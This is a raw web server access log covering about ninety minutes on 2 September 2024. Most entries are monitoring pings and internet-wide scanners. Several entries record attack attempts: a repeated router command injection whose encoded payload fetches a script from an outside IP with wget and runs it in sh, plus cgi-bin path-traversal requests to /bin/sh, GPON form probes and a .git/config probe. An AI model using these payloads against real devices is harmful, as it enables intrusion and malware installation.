65.49.20.66 - - [02/Sep/2024:13:59:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)"
89.190.156.137 - - [02/Sep/2024:13:59:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
65.49.1.21 - - [02/Sep/2024:13:59:23 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
212.91.246.72 - - [02/Sep/2024:13:59:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.66 - - [02/Sep/2024:13:59:42 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
35.166.66.99 - - [02/Sep/2024:13:59:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
89.190.156.137 - - [02/Sep/2024:14:00:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:14:00:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:01:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:02:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:03:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:03:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.232.27 - - [02/Sep/2024:14:03:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:14:04:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:05:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:07:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:14:07:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:08:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:09:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
71.6.232.27 - - [02/Sep/2024:14:10:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
212.91.246.72 - - [02/Sep/2024:14:10:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.196.9.210 - - [02/Sep/2024:14:10:38 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
212.91.246.72 - - [02/Sep/2024:14:11:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:12:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:13:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:14:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:14:14:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:15:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:14:15:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:16:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:17:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:18:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:19:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:14:19:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:14:20:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.251 - - [02/Sep/2024:14:21:32 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:14:21:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.52.167 - - [02/Sep/2024:14:21:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:22:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:23:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:24:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:14:24:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.224.128.84 - - [02/Sep/2024:14:25:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Sep/2024:14:25:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Sep/2024:14:25:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Sep/2024:14:26:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:14:26:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:27:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:28:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
147.135.23.104 - - [02/Sep/2024:14:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
149.50.103.48 - - [02/Sep/2024:14:28:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:28:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:29:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.76.207.254 - - [02/Sep/2024:14:30:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
212.91.246.72 - - [02/Sep/2024:14:30:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:31:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.32.235.85 - - [02/Sep/2024:14:31:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [02/Sep/2024:14:32:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Sep/2024:14:32:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:33:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:33:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:34:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.56 - - [02/Sep/2024:14:35:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.148.10.251 - - [02/Sep/2024:14:35:31 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:14:35:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Sep/2024:14:35:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [02/Sep/2024:14:36:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:36:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:37:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:38:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Sep/2024:14:39:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Sep/2024:14:39:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:40:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.101 - - [02/Sep/2024:14:40:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.101 - - [02/Sep/2024:14:40:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [02/Sep/2024:14:40:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.101 - - [02/Sep/2024:14:40:52 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:41:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:14:42:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:42:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Sep/2024:14:42:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Sep/2024:14:43:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:14:44:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [02/Sep/2024:14:44:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:44:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [02/Sep/2024:14:45:14 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:45:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:46:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:46:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [02/Sep/2024:14:46:43 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [02/Sep/2024:14:47:33 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:47:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:48:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [02/Sep/2024:14:49:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:49:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Sep/2024:14:50:04 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
89.190.156.137 - - [02/Sep/2024:14:50:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:14:50:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:50:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [02/Sep/2024:14:50:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [02/Sep/2024:14:51:28 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:51:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:52:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Sep/2024:14:52:59 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.224.128.84 - - [02/Sep/2024:14:53:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
93.174.93.12 - - [02/Sep/2024:14:53:05 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.224.128.84 - - [02/Sep/2024:14:53:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Sep/2024:14:53:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:53:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:54:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.173 - - [02/Sep/2024:14:54:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:55:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:56:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:14:57:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:57:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:14:58:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [02/Sep/2024:14:58:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:14:58:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.137 - - [02/Sep/2024:14:59:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:14:59:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:14:59:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:15:00:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:15:00:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:01:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:02:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:03:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:04:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:05:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:06:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.254.29.124 - - [02/Sep/2024:15:06:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [02/Sep/2024:15:07:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:09:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [02/Sep/2024:15:10:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Sep/2024:15:10:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.74.239.146 - - [02/Sep/2024:15:10:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [02/Sep/2024:15:11:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.168.130 - - [02/Sep/2024:15:12:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
179.43.168.130 - - [02/Sep/2024:15:12:05 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4"
212.91.246.72 - - [02/Sep/2024:15:12:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:13:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.230.66.144 - - [02/Sep/2024:15:14:09 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [02/Sep/2024:15:14:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.151.155.77 - - [02/Sep/2024:15:15:01 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
89.190.156.137 - - [02/Sep/2024:15:15:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:15:15:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:16:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:17:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:18:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:19:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:20:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.251 - - [02/Sep/2024:15:21:06 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:15:21:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.84 - - [02/Sep/2024:15:21:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
89.190.156.137 - - [02/Sep/2024:15:22:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
212.91.246.72 - - [02/Sep/2024:15:22:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Sep/2024:15:23:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.45 - - [02/Sep/2024:15:24:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.224.128.84 - - [02/Sep/2024:15:24:19 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.84 - - [02/Sep/2024:15:24:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
64.62.197.238 - - [02/Sep/2024:15:24:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.148.10.251 - - [02/Sep/2024:15:24:38 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [02/Sep/2024:15:24:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.48 - - [02/Sep/2024:15:25:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.48 - - [02/Sep/2024:15:25:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
